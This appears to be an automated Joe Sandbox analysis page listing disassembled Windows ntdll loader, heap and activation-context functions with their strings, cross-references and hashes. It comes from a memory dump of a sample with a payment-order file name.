String ID: DLL name: %wZ$DLL search path passed in externally: %ws$LdrGetDllHandleEx$LdrpFindLoadedDllInternal$LdrpInitializeDllPath$Status: 0x%08lx$minkernel\ntdll\ldrapi.c$minkernel\ntdll\ldrfind.c$minkernel\ntdll\ldrutil.c
API String ID: 0-3197712848
Opcode ID: e8335ee431e4b22d84d5f6eb0be1e8470f82050312fe77673f37826060ffd328
Instruction ID: 63ddf1ab67d95e31b286344e0bcad9cafb5f7933b62484ff2469ec8f58f0902f
Opcode Fuzzy Hash: e8335ee431e4b22d84d5f6eb0be1e8470f82050312fe77673f37826060ffd328
Instruction Fuzzy Hash: E212EFB1A293428BD325DF28C841BBAB7E5BFD4704F44092DFAC58B291E774D944CB92

Function 012D0274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON

Download Yara Rule

Strings

RtlReAllocateHeap, xrefs: 012D02BF, 012D0362
Invalid allocation size - %Ix (exceeded %Ix), xrefs: 012D06EA
Just reallocated block at %p to 0x%Ix bytes with tag %ws, xrefs: 012D069F
About to reallocate block at %p to %Ix bytes, xrefs: 012D03BA
About to rellocate block at %p to 0x%Ix bytes with tag %ws, xrefs: 012D04D3
Just reallocated block at %p to %Ix bytes, xrefs: 012D05F1
HEAP[%wZ]: , xrefs: 012D0399, 012D04A8, 012D05D0, 012D0675, 012D06CC
HEAP: , xrefs: 012D03A6, 012D04B5, 012D05DD, 012D0682, 012D06D9

Memory Dump Source

Source File: 00000009.00000002.2198084111.00000000011F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_11f0000_order-payment094093.jbxd

Similarity

API ID:
String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
API String ID: 0-1700792311
Opcode ID: 41f0607186dc39eef9600a5a31f718fec971d23cec904204547d3568a1f2c10f
Instruction ID: 4f17571219808a6f8d822d9f988c3c82f51a2b32f15e0e4c0f1798d55c7423a0
Opcode Fuzzy Hash: 41f0607186dc39eef9600a5a31f718fec971d23cec904204547d3568a1f2c10f
Instruction Fuzzy Hash: 8BD10E35620686DFDB22DFA8C441AAEBBF2FF59710F088059FA459B662C734D841CF58

Function 012A89B3 Relevance: 9.0, Strings: 7, Instructions: 259COMMON

Download Yara Rule

Strings

VerifierDebug, xrefs: 012A8CA5
VerifierDlls, xrefs: 012A8CBD
AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 012A8A67
HandleTraces, xrefs: 012A8C8F
AVRF: -*- final list of providers -*- , xrefs: 012A8B8F
AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 012A8A3D
VerifierFlags, xrefs: 012A8C50

Memory Dump Source

Source File: 00000009.00000002.2198084111.00000000011F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_11f0000_order-payment094093.jbxd

Similarity

API ID:
String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
API String ID: 0-3223716464
Opcode ID: 8956cf58a7d87e879753240d2285fcf8269cc8dc57bd864f69063c09fb4b3be8
Instruction ID: c37bdc8dc687dfc7e2e3dfeabc293dcac14e21a2d0e5a42e85f89c66281bd559
Opcode Fuzzy Hash: 8956cf58a7d87e879753240d2285fcf8269cc8dc57bd864f69063c09fb4b3be8
Instruction Fuzzy Hash: 81918972661702EFD726EF68C881B6B7BE8EB99715F800918FB41AB241D770DC01CB91

Function 0122EA80 Relevance: 8.6, Strings: 6, Instructions: 1073COMMON

Download Yara Rule

Strings

R, xrefs: 0122EB62
{, xrefs: 01284643
T, xrefs: 0122EB4E
LdrpResSearchResourceInsideDirectory Exit, xrefs: 0122EB6C
, xrefs: 0122F299
LdrpResSearchResourceInsideDirectory Enter, xrefs: 0122EB58

Memory Dump Source

Source File: 00000009.00000002.2198084111.00000000011F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_11f0000_order-payment094093.jbxd

Similarity

API ID:
String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
API String ID: 0-1109411897
Opcode ID: 539ea149e0494d3c64f9810a0a3daca524813b1dee9ff05af64759dabd3dde73
Instruction ID: 7b123f43ed95be591143143baf3ebbedb5767435e68d53ff0e9c7c852e1cb974
Opcode Fuzzy Hash: 539ea149e0494d3c64f9810a0a3daca524813b1dee9ff05af64759dabd3dde73
Instruction Fuzzy Hash: ECA25C70A2566A8FDB64EF18CD987ADBBB5EF45304F2442D9D90DA7291DB709E80CF00

Function 012563FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON

Download Yara Rule

Strings

NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop, xrefs: 012941FE
_LdrpInitialize, xrefs: 012940DF, 01294141, 01294205, 0129425F
Process initialization failed with status 0x%08lx, xrefs: 0129413A
minkernel\ntdll\ldrinit.c, xrefs: 012940E9, 0129414B, 0129420F, 01294269
Delaying execution failed with status 0x%08lx, xrefs: 01294258
LDR:MRDATA: Process initialization failed with status 0x%08lx, xrefs: 012940D8

Memory Dump Source

Source File: 00000009.00000002.2198084111.00000000011F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_11f0000_order-payment094093.jbxd

Similarity

API ID:
String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
API String ID: 0-792281065
Opcode ID: 901ebc5e662723e71f5bbf87069f7b6338cbce8adca76222f5b69ec9f83be74a
Instruction ID: 8a46e85a32c3362c38ea62f21403451417976e39a3cfc7ed2475ad33e99edee3
Opcode Fuzzy Hash: 901ebc5e662723e71f5bbf87069f7b6338cbce8adca76222f5b69ec9f83be74a
Instruction Fuzzy Hash: 60913A70B30356DBEF39EF5CD985BBA7BA5FB41B28F400169EA0067285D7B09842C790

Function 0121645D Relevance: 7.6, Strings: 6, Instructions: 150COMMON

Download Yara Rule

Strings

Loading the shim user DLL failed with status 0x%08lx, xrefs: 01279A2A
Getting the shim user exports failed with status 0x%08lx, xrefs: 01279A01
LdrpInitShimEngine, xrefs: 012799F4, 01279A07, 01279A30
minkernel\ntdll\ldrinit.c, xrefs: 01279A11, 01279A3A
Building shim user DLL system32 filename failed with status 0x%08lx, xrefs: 012799ED
apphelp.dll, xrefs: 01216496

Memory Dump Source

Source File: 00000009.00000002.2198084111.00000000011F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_11f0000_order-payment094093.jbxd

Similarity

API ID:
String ID: Building shim user DLL system32 filename failed with status 0x%08lx$Getting the shim user exports failed with status 0x%08lx$LdrpInitShimuser$Loading the shim user DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
API String ID: 0-204845295
Opcode ID: 9aeade981ec0065d4b175788dc274a53206bc474671c4a6a3e3dbb50b75c8656
Instruction ID: dd04b03b268c092fdb25574097373ca4a1ce0350f721244251efcd0061dcb8f9
Opcode Fuzzy Hash: 9aeade981ec0065d4b175788dc274a53206bc474671c4a6a3e3dbb50b75c8656
Instruction Fuzzy Hash: CF511271268301DFEB21EF24D841BAB77E8FB84758F00091EF685971A4DB70E984CB92

Function 01252674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON

Download Yara Rule

Strings

RtlGetAssemblyStorageRoot, xrefs: 01292160, 0129219A, 012921BA
SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0129219F
SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01292180
SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01292178
SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 012921BF
SXS: %s() passed the empty activation context, xrefs: 01292165

Memory Dump Source

Source File: 00000009.00000002.2198084111.00000000011F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_11f0000_order-payment094093.jbxd

Similarity

API ID:
String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
API String ID: 0-861424205
Opcode ID: 5a40417155551ed9f2b66c150014be588a000f4533f311fa396cd0c6da89b079
Instruction ID: 5f2930282983d672d2eb3d2dacab41f59e756d4c449c5f688abcb0ea37c2c581
Opcode Fuzzy Hash: 5a40417155551ed9f2b66c150014be588a000f4533f311fa396cd0c6da89b079
Instruction Fuzzy Hash: BF31E776B70216F7EB22CA9D8C85F6A7A78DB65A50F054159BF0477182D370AA00C7A1

Function 0125C6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON

Download Yara Rule

Strings

Loading import redirection DLL: '%wZ', xrefs: 01298170
LdrpInitializeProcess, xrefs: 0125C6C4
minkernel\ntdll\ldrredirect.c, xrefs: 01298181, 012981F5
LdrpInitializeImportRedirection, xrefs: 01298177, 012981EB
minkernel\ntdll\ldrinit.c, xrefs: 0125C6C3
Unable to build import redirection Table, Status = 0x%x, xrefs: 012981E5

Memory Dump Source

Source File: 00000009.00000002.2198084111.00000000011F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_11f0000_order-payment094093.jbxd

Similarity

API ID:
String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
API String ID: 0-475462383
Opcode ID: 5f5f867ee195af5795353b66af009f7b88f84dc21c83a9f0a4b3de586ad23333
Instruction ID: bc557bc56518c23162eb9c390fdbbb9a7fff41131c7021cd0031ad1cf8a85675
Opcode Fuzzy Hash: 5f5f867ee195af5795353b66af009f7b88f84dc21c83a9f0a4b3de586ad23333
Instruction Fuzzy Hash: 253113716643469FD324EF29D886E2A7BD8FF95B10F040558F940AB2D1E660ED04C7A2

Function 0126096E Relevance: 6.6, APIs: 4, Instructions: 606COMMON

Download Yara Rule

APIs

Part of subcall function 01262DF0: LdrInitializeThunk.NTDLL ref: 01262DFA

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01260BA3
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01260BB6
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01260D60
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01260D74

Memory Dump Source

Source File: 00000009.00000002.2198084111.00000000011F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_11f0000_order-payment094093.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
String ID:
API String ID: 1404860816-0
Opcode ID: 1d4f5bdb39b3835c50a116aed196ed2ca4f9e293f73fea92380b383580553b4e
Instruction ID: 839c8c364dac27eb31a51ade89cb7b2f8cf13195b3b19408dc610e4d177a6650
Opcode Fuzzy Hash: 1d4f5bdb39b3835c50a116aed196ed2ca4f9e293f73fea92380b383580553b4e
Instruction Fuzzy Hash: C3424C71910716DFDB21CF68C881BAAB7F9FF44314F1445AAE989DB281E770A984CF60

Function 0122A3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON

Download Yara Rule

Strings

LdrResFallbackLangList Enter, xrefs: 0122A3EF
6, xrefs: 0122A3F7
8, xrefs: 0122A3E7
LdrResFallbackLangList Exit, xrefs: 0122A3FF

Memory Dump Source

Source File: 00000009.00000002.2198084111.00000000011F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_11f0000_order-payment094093.jbxd

Similarity

API ID:
String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
API String ID: 0-379654539
Opcode ID: ec038d80f8b6967f83c5651e99db88b9a6ff84c0e92c5225e34a32c8ada0e9a3
Instruction ID: cd99e08ae960f02697961d6ec5343feb073f4d4afe15dce742c89e978238a933
Opcode Fuzzy Hash: ec038d80f8b6967f83c5651e99db88b9a6ff84c0e92c5225e34a32c8ada0e9a3
Instruction Fuzzy Hash: E5C1BB70528392EFD721DF58C144B6EB7E4FF84304F04896AFA868BA91E374C949CB52

Function 01258402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON

Download Yara Rule

Strings

LdrpInitializeProcess, xrefs: 01258422
minkernel\ntdll\ldrinit.c, xrefs: 01258421
@, xrefs: 01258591
\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 0125855E

Memory Dump Source

Source File: 00000009.00000002.2198084111.00000000011F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_11f0000_order-payment094093.jbxd

Similarity

API ID:
String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
API String ID: 0-1918872054
Opcode ID: 2a0366931b7b1b7adb0ed88ca2be02558b55315c45672a7668197ff96aba2112
Instruction ID: b393b5b22a228b537768c2f7d16e1d2dd0640e3dd2baefa550083cac1739d854
Opcode Fuzzy Hash: 2a0366931b7b1b7adb0ed88ca2be02558b55315c45672a7668197ff96aba2112
Instruction Fuzzy Hash: 6E919D71668346AFD722DF26C881F7BBAECFB84744F40092EFA8492151E374D9448B62

Function 0125273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON

Download Yara Rule

Strings

.Local, xrefs: 012528D8
SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 012922B6
RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 012921D9, 012922B1
SXS: %s() passed the empty activation context, xrefs: 012921DE

Memory Dump Source

Source File: 00000009.00000002.2198084111.00000000011F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_11f0000_order-payment094093.jbxd

Similarity

API ID:
String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
API String ID: 0-1239276146
Opcode ID: 46b0d7be8dbe1f4d03fd39e9817eb038f061b3e4421607127226cd26086b1424
Instruction ID: 7f30971919b1ba0f80bc47e2263ccdafc6fc7082a4290038d7b2bb5bbcc1b644
Opcode Fuzzy Hash: 46b0d7be8dbe1f4d03fd39e9817eb038f061b3e4421607127226cd26086b1424
Instruction Fuzzy Hash: 87A1A03592022ADBDB65CF58D884BA9B7B4BF58314F2441E9DE08AB391D7709E80CF90

Function 01254AD0 Relevance: 5.2, Strings: 4, Instructions: 228COMMON

Download Yara Rule

Strings

SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01293456
RtlDeactivateActivationContext, xrefs: 01293425, 01293432, 01293451
SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01293437
SXS: %s() called with invalid flags 0x%08lx, xrefs: 0129342A

Memory Dump Source

Source File: 00000009.00000002.2198084111.00000000011F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_11f0000_order-payment094093.jbxd

Similarity

API ID:
String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
API String ID: 0-1245972979
Opcode ID: d0602320fd0e2057a353aeae175b104e97b80804717741204f6ed1fc1023105c
Instruction ID: b119f99a27750eca544da07ccc0c10225bfdec38e507ca07bd69d015a5ae458e
Opcode Fuzzy Hash: d0602320fd0e2057a353aeae175b104e97b80804717741204f6ed1fc1023105c
Instruction Fuzzy Hash: C56113366306529BDB22DE2CC882B2AF7E5FF80B50F158519EE559B241E770E841CB91

Function 012264AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON

Download Yara Rule

Strings

ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 0128106B
ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 012810AE
ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01280FE5
ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01281028

Memory Dump Source

Source File: 00000009.00000002.2198084111.00000000011F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_11f0000_order-payment094093.jbxd

Similarity

API ID:
String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
API String ID: 0-1468400865
Opcode ID: 63476aa45bfc2a89631160c16200d5d86602df3ab798ee09bcdcd8a8555e984b
Instruction ID: 8b7a642c543337042e0e86eb0e1b0c62b26385376fd6330cea7dcd68f931dd69
Opcode Fuzzy Hash: 63476aa45bfc2a89631160c16200d5d86602df3ab798ee09bcdcd8a8555e984b
Instruction Fuzzy Hash: E27104B2524316AFCB21EF14C885BAB7FA8EFA4754F400468FD488B186D774D598CBD1

Function 01254D1D Relevance: 5.1, Strings: 4, Instructions: 117COMMON

Download Yara Rule

Strings

minkernel\ntdll\ldrsnap.c, xrefs: 01293640, 0129366C
LdrpFindDllActivationContext, xrefs: 01293636, 01293662
Querying the active activation context failed with status 0x%08lx, xrefs: 0129365C
Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 0129362F

Memory Dump Source

Source File: 00000009.00000002.2198084111.00000000011F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_11f0000_order-payment094093.jbxd

Similarity

API ID:
String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
API String ID: 0-3779518884
Opcode ID: f655bf83c88a5a6afbc8b6c4430547012fbba0423f30dd34c8feffa603e43046
Instruction ID: 7f017ccd64d8c416f1193494d8db6a19493ca1a15572282d216ee6171f2a4e37
Opcode Fuzzy Hash: f655bf83c88a5a6afbc8b6c4430547012fbba0423f30dd34c8feffa603e43046
Instruction Fuzzy Hash: AC31E332932693AEEF76FA1C88C9B75F6A8BB01754F06412AEF0457152F7B09CC08795

Function 0124245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON

Download Yara Rule

Strings

Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0128A992
minkernel\ntdll\ldrinit.c, xrefs: 0128A9A2
LdrpDynamicShimModule, xrefs: 0128A998
apphelp.dll, xrefs: 01242462

Memory Dump Source

Source File: 00000009.00000002.2198084111.00000000011F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_11f0000_order-payment094093.jbxd

Similarity

API ID:
String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
API String ID: 0-176724104
Opcode ID: 05c317b61f0f153942cc914a75a169d953692787ac4068b4806a89a053e0cafe
Instruction ID: 0cb0a38cde5aaa4d2a7828712b3b203feebe797ac224646436d2feb20adc7ef8
Opcode Fuzzy Hash: 05c317b61f0f153942cc914a75a169d953692787ac4068b4806a89a053e0cafe
Instruction Fuzzy Hash: 9E316D75631202EBDB35EF9DD845E7ABBB8FB84714F16005AF90067285CBF09841C740

Function 012329A0 Relevance: 4.7, Strings: 3, Instructions: 966COMMON

Download Yara Rule

Strings

Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 0123327D
HEAP[%wZ]: , xrefs: 01233255
HEAP: , xrefs: 01233264

Memory Dump Source

Source File: 00000009.00000002.2198084111.00000000011F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_11f0000_order-payment094093.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
API String ID: 0-617086771
Opcode ID: 7644f1f40cc3c9cc3ca36bafe1622b335c13c9f0797b7cbcb655d2b3f1b81dcb
Instruction ID: 0989a1636e0d69091c02daf25baf0602d525e894ec41dacf3169f94c76e33e58
Opcode Fuzzy Hash: 7644f1f40cc3c9cc3ca36bafe1622b335c13c9f0797b7cbcb655d2b3f1b81dcb
Instruction Fuzzy Hash: 4E92CDB1A2424ADFDB29CF68C4447AEBBF1FF88300F188459E949AB391D775A941CF50

Function 01230770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON

Download Yara Rule

Strings

HEAP[%wZ]: , xrefs: 012850AE
(UCRBlock->Size >= *Size), xrefs: 012850CA
HEAP: , xrefs: 012850BD

Memory Dump Source

Source File: 00000009.00000002.2198084111.00000000011F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_11f0000_order-payment094093.jbxd

Similarity

API ID:
String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
API String ID: 0-4253913091
Opcode ID: f60d64203cb880fb9e920536bc61c5ddacc469d6cebe21b7a8fd7b2138dc325d
Instruction ID: e00d65d6a228cad16003a4cf4d82b8d3f73fe0adb1eceb485c273f97393b146c
Opcode Fuzzy Hash: f60d64203cb880fb9e920536bc61c5ddacc469d6cebe21b7a8fd7b2138dc325d
Instruction Fuzzy Hash: 0DF1DEB0621606DFEB25DF68C884B7AB7F5FF84704F148168E6069B385D770E981CBA4

Function 01246962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON

Download Yara Rule

Strings

@, xrefs: 01246C24
, xrefs: 0128CA51

Memory Dump Source

Source File: 00000009.00000002.2198084111.00000000011F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_11f0000_order-payment094093.jbxd

Similarity

API ID: InitializeThunk
String ID: $@
API String ID: 2994545307-1077428164
Opcode ID: e1989dbc6fb5481f115db16f1648ed2a15cb524efb8e0f4356b5f66c5b673e5c
Instruction ID: 67dd1530a4954ff36ce929da2e252390696d7d56a596c5990a95325dd2188271
Opcode Fuzzy Hash: e1989dbc6fb5481f115db16f1648ed2a15cb524efb8e0f4356b5f66c5b673e5c
Instruction Fuzzy Hash: 73C292716293429FE729CF28C441BABBBE5AFC8714F04892DFA99C7241D774D844CB62

Function 0121A197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON

Download Yara Rule

Strings

FilterFullPath, xrefs: 0127C2E6
UseFilter, xrefs: 0121A1C1
\??\, xrefs: 0127C1E4

Memory Dump Source

Source File: 00000009.00000002.2198084111.00000000011F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_11f0000_order-payment094093.jbxd

Similarity

API ID:
String ID: FilterFullPath$UseFilter$\??\
API String ID: 0-2779062949
Opcode ID: edfa926d77f41159079f8b781c15300a61fc7204c9be4616a9efbbf79d4a41bb
Instruction ID: e8fbdab1960d652de489501871470e75922ace5335aa4cf5fd29b1e10f3d29fb
Opcode Fuzzy Hash: edfa926d77f41159079f8b781c15300a61fc7204c9be4616a9efbbf79d4a41bb
Instruction Fuzzy Hash: 31A1407192162A9BDB31DF64CC88BEAB7B8EF44710F1041EAEA09A7250D7359EC4CF50

Function 01240BCB Relevance: 4.0, Strings: 3, Instructions: 210COMMON

Download Yara Rule

Strings

LdrpCheckModule, xrefs: 0128A117
minkernel\ntdll\ldrinit.c, xrefs: 0128A121
Failed to allocated memory for shimmed module list, xrefs: 0128A10F

Memory Dump Source

Source File: 00000009.00000002.2198084111.00000000011F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_11f0000_order-payment094093.jbxd

Similarity

API ID:
String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
API String ID: 0-161242083
Opcode ID: a8b2e6137aa3a975671455701e6b7c0641b496840ff8dec9df901bd35d151ded
Instruction ID: d401a99db7138856bc3e833c2f20c65c4f39493967a83e1f047ef333e75360c3
Opcode Fuzzy Hash: a8b2e6137aa3a975671455701e6b7c0641b496840ff8dec9df901bd35d151ded
Instruction Fuzzy Hash: 1C71B470A20206DFDB29EF68C941BBEB7F8FB44704F15406DEA02D7255E774A981CB58

Function 01230A5B Relevance: 3.9, Strings: 3, Instructions: 190COMMON

Download Yara Rule

Strings

((PHEAP_ENTRY)LastKnownEntry <= Entry), xrefs: 0128534D
HEAP[%wZ]: , xrefs: 01285335
HEAP: , xrefs: 01285342

Memory Dump Source

Source File: 00000009.00000002.2198084111.00000000011F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_11f0000_order-payment094093.jbxd

Similarity

API ID:
String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
API String ID: 0-1334570610
Opcode ID: a6d3b6bf9b01173cdafbbec4723a957a99312253d87185e1e4eaa4afd7d7d9db
Instruction ID: 87ed14608b0fb2119ce174efc1f06cc02794919f9344a2183752d7f800ac6b74
Opcode Fuzzy Hash: a6d3b6bf9b01173cdafbbec4723a957a99312253d87185e1e4eaa4afd7d7d9db
Instruction Fuzzy Hash: E061C0B0620302DFDB29DF28C441B6ABBF2FF85304F148559E5498F296D7B0E881CBA5

Function 0125C720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON

Download Yara Rule

Strings

LdrpInitializePerUserWindowsDirectory, xrefs: 012982DE
minkernel\ntdll\ldrinit.c, xrefs: 012982E8
Failed to reallocate the system dirs string !, xrefs: 012982D7

Memory Dump Source

Source File: 00000009.00000002.2198084111.00000000011F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_11f0000_order-payment094093.jbxd

Similarity

API ID:
String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
API String ID: 0-1783798831
Opcode ID: 908844c40c62c9d8836dedf4f3e1b6651a7301d655ee5e19d32a72c572e874f0
Instruction ID: 7717c38fd2a34d11f6c4a494d4fd45e7aec2197c352a09e025da4b3e6bf6afae
Opcode Fuzzy Hash: 908844c40c62c9d8836dedf4f3e1b6651a7301d655ee5e19d32a72c572e874f0
Instruction Fuzzy Hash: E54107B1574306ABC725EB68D885B6B77ECEF44760F04492AFA48D7294E7B0D810CB91

Function 012DC188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON

Download Yara Rule

Strings

PreferredUILanguages, xrefs: 012DC212
\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 012DC1C5
@, xrefs: 012DC1F1

Memory Dump Source

Source File: 00000009.00000002.2198084111.00000000011F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_11f0000_order-payment094093.jbxd

Similarity

API ID:
String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
API String ID: 0-2968386058
Opcode ID: cf45578982aa3999563da702d32cb6541a0dc8dc051cb40f6180032aaa6a0d77
Instruction ID: d33e83c85cefd521dfb9e5bd93759d42b9768ca0795fe4af382246c981b53666
Opcode Fuzzy Hash: cf45578982aa3999563da702d32cb6541a0dc8dc051cb40f6180032aaa6a0d77
